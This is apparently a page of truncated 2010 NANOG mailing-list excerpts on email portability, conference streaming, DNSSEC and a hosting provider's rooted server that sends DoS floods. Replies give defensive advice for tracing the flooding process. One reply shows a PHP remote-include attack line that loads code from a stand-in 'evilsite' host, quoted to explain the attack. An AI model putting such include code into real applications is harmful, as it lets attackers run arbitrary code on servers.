Robert Bonomi wrote:
Quick! Somebody propose a snail-mail portability bill. When a renter
changes to a different landlord, his snail-mail address will be optionally
his to take along, just like what is proposed for ISP clients.
No, a complete street address portability system.
Assuming
On 2/22/10 7:28 PM, Joe Abley wrote:
On 2010-02-22, at 10:09, Gadi Evron wrote:
The email portability bill has just been approved by the Knesset's committee
for legislation, sending it on its way for the full legislation process of the
Israeli parliament.
While many users own a free email
On Tue, 23 Feb 2010 01:25:42 -0500
Steven Bellovin s...@cs.columbia.edu wrote:
Figuring out how such a solution would work with email is left as an exercise
for the reader.
OK, let me give it a shot.
How about if we allow anyone to buy a domain name of their own and then
hire someone (e.g.
On Tue, Feb 23, 2010 at 05:39:53AM -0500, D'Arcy J.M. Cain wrote:
On Tue, 23 Feb 2010 01:25:42 -0500
Steven Bellovin s...@cs.columbia.edu wrote:
Figuring out how such a solution would work with email is left as an
exercise for the reader.
OK, let me give it a shot.
How about if we
On 23/02/10 09:40, Johnny Eriksson wrote:
Robert Bonomi wrote:
Quick! Somebody propose a snail-mail portability bill. When a renter
changes to a different landlord, his snail-mail address will be optionally
his to take along, just like what is proposed for ISP clients.
No, a
Just wait till customers start wanting to take their IP address with
them when they move...
When that happens, I hope there will be a new generation of suckers to
fix it.
There is PI space, you know ;)
--
Måns Nilsson primary/secondary/besserwisser/machina
MN-1334-RIPE
On 2/23/10 1:25 AM, Steven Bellovin wrote:
...
And who runs this database?
Local number portability requires a new database, one that didn't exist before,
It's run by a neutral party and maps any phone number to a carrier and
endpoint identifier. (In the US, that database is currently run
[* Is trimming included text a lost art nowadays? *]
On Tue, 23 Feb 2010 10:43:23+ Cian Brennan
cian.bren...@redbrick.dcu.ie wrote:
Maybe politicians should just keep their nose out of things that they
can't understand. Email addresses aren't phone numbers.
As has been pointed out
Hello,
We are looking for this year a Provider in Johannesburg for a temporay
Internetconnection for 1 Mounth during the WM 2010. Does somebody know a
Provider which has stabile line there. With speed 2 Mb or more. (guarantie)
Greetings
Xaver
http://www.computerworld.com/s/article/9160298/Commercial_networks_in_Haiti_cause_problems_for_local_ISPs
IDG News Service - While the communications networks that aid groups set
up quickly following the earthquake in Haiti were surely critical to
rescue efforts, the new networks have had
On 2/23/2010 1:25 AM, Steven Bellovin wrote:
Figuring out how such a solution would work with email is left as an exercise
for the reader.
Well, clearly, the planet just needs to join Active Directory, and the
user convert to Outlook, and use the Global Address List, and...
[Sorry, I
On 2/22/2010 11:20 PM, Dave CROCKER wrote:
On 2/22/2010 8:42 PM, Larry Sheldon wrote:
When Somebody calls one of my portable telephone numbers, they don't
get a message telling them they have to call some other number. The get
call progress tones.
You are confusing what is presented
Web browser embedded flash player:
http://nanog.iristransport.net/nanog48/
VLC direct link:
http://204.29.15.165:10001
Enjoy,
-Tk
On Tue, 2010-02-23 at 10:53 +, Leigh Porter wrote:
Just wait till customers start wanting to take their IP address with
them when they move...
Oh wow, I think I've still got a log (somewhere) of all the dialup IPs I
was assigned during the early 90s. Since I might be able to claim them
On 2/23/2010 4:39 AM, D'Arcy J.M. Cain wrote:
Maybe politicians should just keep their nose out of things that they
can't understand. Email addresses aren't phone numbers.
It occurs to me that maybe there is a reason why political conservatives
get so excited about minor, trivial erosions of
On Tue, 2010-02-23 at 09:34 -0500, Jeff Kell wrote:
Well, clearly, the planet just needs to join Active Directory, and the
user convert to Outlook, and use the Global Address List, and...
Ahem! If they (M$) were to go back to the LDAP specs, they could save a
lot of time. They could even
On 2/22/2010 12:02 PM, Joel Esler wrote:
I have an idea. Everyone just get a gmail (or otherwise neutral account)
like me.com or gmail.com or yahoo.com and be done with it.
J
Sure and give all that information to data mining companies with no
interest in privacy. No thank you. I
On 2/23/2010 4:43 AM, Cian Brennan wrote:
As has been pointed out several times, they can easily be pretty close. Simply
force them to send using the outgoing server of their new ISP, but allow them
to still access their mailbox (which is really the only important bit the ISP
hosts) over
Larry Sheldon wrote (on Tue, Feb 23, 2010 at 10:28:03AM -0600):
On 2/23/2010 4:39 AM, D'Arcy J.M. Cain wrote:
Maybe politicians should just keep their nose out of things that they
can't understand. Email addresses aren't phone numbers.
It occurs to me that maybe there is a reason why
DNSSEC with powerdns is under development. Its coming soon to a server
near you.
--C
On 2/22/2010 3:16 PM, Grzegorz Janoszka wrote:
On 22-2-2010 15:39, Phil Regnauld wrote:
PowerDNS also has an open source solution (www.powerdns.com).
PowerDNS
is easily modified with custom
N. Yaakov Ziskind allegedly wrote on 02/23/2010 11:34 EST:
Larry Sheldon wrote (on Tue, Feb 23, 2010 at 10:28:03AM -0600):
On 2/23/2010 4:39 AM, D'Arcy J.M. Cain wrote:
Maybe politicians should just keep their nose out of things that they
can't understand. Email addresses aren't phone
On Feb 23, 2010, at 8:34 AM, N. Yaakov Ziskind wrote:
Larry Sheldon wrote (on Tue, Feb 23, 2010 at 10:28:03AM -0600):
On 2/23/2010 4:39 AM, D'Arcy J.M. Cain wrote:
Maybe politicians should just keep their nose out of things that they
can't understand. Email addresses aren't phone numbers.
When in Tokyo, always have a MAP showing where you want to go.
On Feb 23, 2010, at 11:34 AM, N. Yaakov Ziskind wrote:
Larry Sheldon wrote (on Tue, Feb 23, 2010 at 10:28:03AM -0600):
On 2/23/2010 4:39 AM, D'Arcy J.M. Cain wrote:
Maybe politicians should just keep their nose out of things that
On Tue, Feb 23, 2010 at 10:32:45AM -0600, Larry Sheldon wrote:
On 2/23/2010 4:43 AM, Cian Brennan wrote:
As has been pointed out several times, they can easily be pretty close.
Simply
force them to send using the outgoing server of their new ISP, but allow
them
to still access their
Larry Sheldon wrote:
On 2/23/2010 4:43 AM, Cian Brennan wrote:
As has been pointed out several times, they can easily be pretty close. Simply
force them to send using the outgoing server of their new ISP, but allow them
to still access their mailbox (which is really the only important bit the
On 2/23/2010 8:44 AM, Scott Brim wrote:
Simple: you separate 'mail' addresses from 'fire' addresses. Mail
addresses are identifiers. Fire addresses are locators.
wrong approach.
simply get fire engines to have heat sensors and set their gps accordingly.
d/
--
Dave Crocker
On 2/23/2010 9:26 AM, Anton Kapela wrote:
Web browser embedded flash player:
http://nanog.iristransport.net/nanog48/
VLC direct link:
http://204.29.15.165:10001
Enjoy,
-Tk
Heh. This message may be a scam and Thunderbird thinks this message
is a scam. The links in the
--On 23 February 2010 09:06 -0600 Larry Sheldon
larryshel...@cox.net wrote:
No kidding--something like making airlines do something railroads
can do.
I guess that depends whether you are talking about issuing flexible
tickets or cruising at zero feet.
--
Rob.
If you want an example of just what would result, take a trip to Tokyo,
where house numbers were assigned in the order that building permits
were issued, and you need *extremely* detailed directions.
The Soviet Union was not quite as chaotic as that, but they also didn't
keep an organized
On 2/23/2010 10:54 AM, John Sage wrote:
Unquote
I'd want to trade my email address for one that doesn't trigger empty
responses.
Or get me banned.
But he's right, we should take the discussion of operational issues
somewhere else.
--
Government big enough to supply everything you need is big
Anton Kapela wrote:
Web browser embedded flash player:
http://nanog.iristransport.net/nanog48/
7pm appears to be a bad time to tune in if you're in the UK...
Poggs
Peter Hicks wrote:
Anton Kapela wrote:
Web browser embedded flash player:
http://nanog.iristransport.net/nanog48/
7pm appears to be a bad time to tune in if you're in the UK...
The audio overlay of the people talking about the cake is quite
humorous, I must say.
AlanC
signature.asc
Hi folks...
We have a strange series of events going on in the past while Brief
history here, looking for input from the community - especially some of
the security folks on here.
We provide web hosting services - one of our hosting boxes was found a
while back with root kits installed,
Johnny Eriksson wrote:
Robert Bonomi wrote:
Quick! Somebody propose a snail-mail portability bill. When a renter
changes to a different landlord, his snail-mail address will be optionally
his to take along, just like what is proposed for ISP clients.
No, a complete street address
Quick suggestion BUT you may want to have Parallels look into it if
you can't seem to find it since you pay for the support anyways. You
may also want to check to see if it is a cron job that is doing it (if
the machine was root kitted, you may have accidentally copied a cron
job over. Another
The user could also be running the command inline somehow or deleting the file
when they log off. Check who was logged onto the server at the time of the
attack to narrow down your search. I like the split the users idea, though it
could be several iterations to narrow down the culprit.
Place an ids in front of the server and write a rule for the traffic
signature.
Paul B.
Sent with Android
On Feb 23, 2010 3:25 PM, Matt Sprague mspra...@readytechs.com wrote:
The user could also be running the command inline somehow or deleting the
file when they log off. Check who was logged
The user could also be running the command inline somehow or deleting the
file when they log off.
wiretapping your SSHd is one way to find out what people are up to
http://forums.devshed.com/bsd-help-31/logging-ssh-shell-sessions-30398.html
Also .. if you have the resources, a passive tap
On 23/02/10 15:19 -0500, Ronald Cotoni wrote:
Quick suggestion BUT you may want to have Parallels look into it if
you can't seem to find it since you pay for the support anyways. You
may also want to check to see if it is a cron job that is doing it (if
the machine was root kitted, you may have
These tools will relate IP flow to UID in Linux:
# Get the sockets that are open
netstat -an
# lsof (as root) sockets to pid and owner uid.
lsof
If netstat doen't show it, it could be a raw socket... Or your root-kit's
still there. Raw sockets will still show in lsof.
Alex
On Tue, Feb 23, 2010
On Tue, Feb 23, 2010 at 02:46:54PM -0500, Paul Stewart wrote:
Hi folks...
We have a strange series of events going on in the past while Brief
history here, looking for input from the community - especially some of
the security folks on here.
We provide web hosting services -
What tools/practices do others use to resolve this issue?
use lsof, should be able to show you consumption of network socket
resources by process (and hence user, hopefully)
Dave.
Once upon a time, Matt Sprague mspra...@readytechs.com said:
The user could also be running the command inline somehow or deleting
the file when they log off. Check who was logged onto the server at
the time of the attack to narrow down your search. I like the split
the users idea, though
The suggestion to own your own domain name coupled with some consumer
protection against practices which resist transferring domain names to
a new provider solves this problem well enough.
Maybe that's even what's slipping thru the cracks of these 10 second
mechanical google translations?
--
From personal experience you will likely not find much help from
Parallels. We provide webhosting here on the Plesk 8.x and 9 platforms
and in similar situations I have found good results using a combination
of OSSEC (http://www.ossec.net/ BIG shout out to these guys, this
project makes my life so
On Tue, Feb 23, 2010 at 02:46:54PM -0500, Paul Stewart wrote:
The problem is that a user on this box appears to be launching high
traffic DOS attacks from it towards other sites.
It's possible the user inadvertently enabled the same exploit after you
rebuilt the system. I suggest caution with
On Tue, 23 Feb 2010 11:27:21 -1000, Nate Itkin said:
On Tue, Feb 23, 2010 at 02:46:54PM -0500, Paul Stewart wrote:
The problem is that a user on this box appears to be launching high
traffic DOS attacks from it towards other sites.
It's possible the user inadvertently enabled the same
Using lsof, netstat, ls, ps, looking through proc with ls, cat, etc. is likely
to not work if there's a rootkit on the box. The whole point of a rootkit is to
hide processes and files from these tools.
Get some statically linked versions of these bins on to the server, and hope
they haven't
Just figured I might add a little direction to this.
1. If its a production system that impacts several users/customers your best
bet would be to rebuild the system from scratch, not an image. Yes takes
time, but investigating it will likely take longer. As you previously
mentioned the
The problem is that a user on this box appears to be launching high
traffic DOS attacks from it towards other sites. These are UDP based
floods that move around from time to time - most of these attacks only
last a few minutes.
I've done tcpdumps within seconds of the attack starting
7pm appears to be a bad time to tune in if you're in the UK...
The streaming is very appreciated. A clock visible to the camera would
save the hassle of translating local time to agenda time.
--
Glen Turner http://www.gdt.id.au/~gdt/
On 2/23/10 9:46 PM, Paul Stewart wrote:
Hi folks...
We have a strange series of events going on in the past while Brief
history here, looking for input from the community - especially some of
the security folks on here.
If you can't discover the malware using methods available to you, are
--- g...@gdt.id.au wrote:
From: Glen Turner g...@gdt.id.au
7pm appears to be a bad time to tune in if you're in the UK...
The streaming is very appreciated. A clock visible to the camera would
save the hassle of translating local time to agenda time.
Why does there need to be blame? Diagnose the problem, fix the problem, move
on with life. Someone made a mistake, learn from it, move on.
--
Joel Esler
joel.es...@me.com
http://www.joelesler.net
On Tuesday, February 23, 2010, at 05:13PM, valdis.kletni...@vt.edu wrote:
On Tue, 23 Feb 2010
I've seem similar. Another variant of this is PHP code that lets
arbitrary data be inputted into require() or include() statements, for
example: include('http://evilsite.com/evil.txt'). That way, the attacker
can then load whatever code they want and it will never be saved to the
file system. I
On Mon, Feb 22, 2010 at 04:15:22PM -0600, fedora fedora wrote:
Anyone has good recommendations for an open-sourced log parsing and
analyzing application? It will be used to work with syslog-ng and other
general syslog and application logs.
I have been looking at swatch and logwatch, but
56 matches
Mail list logo